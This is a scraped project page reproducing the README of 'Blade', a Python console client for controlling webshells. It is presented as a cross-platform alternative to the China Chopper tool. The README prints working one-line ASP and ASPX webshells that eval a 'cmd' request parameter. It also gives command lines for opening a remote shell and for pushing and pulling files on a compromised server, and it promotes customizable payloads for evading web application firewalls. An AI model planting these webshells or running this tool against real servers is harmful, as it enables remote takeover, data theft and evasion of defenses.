Git Product home page Git Product logo

blade's Introduction

##Blade Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (**่œๅˆ€). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not. ##Major functions Manage a web server with only one-line code on it, just like:

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management. ##Features Cross-plaform supported (Python needed)

Customizable WAF bypass payloads

Compatible with Chooper's server side scripts ##Server side scripts examples PHP:

ASP: <%eval request("cmd")%>

ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%> ##Usage Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd --shell

Get a shell with longer timeout (i.e. for windows):

python blade.py -u http://localhost/shell.aspx -s asp -p cmd --shell -t 60

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path ##Current issues Server side scripts supporting is not completed, currently support PHP, ASP and ASPX ASPX file upload/download is still under development

Database management function is not completed, so can not connect databases

##TODO Implment JSP

Fix file handling

##Future developent Beacuse I am busy sometimes, the progress of development may be a bit slow. If anyone intrest this project, welcome fork!

blade's People

Contributors

wonderqs avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.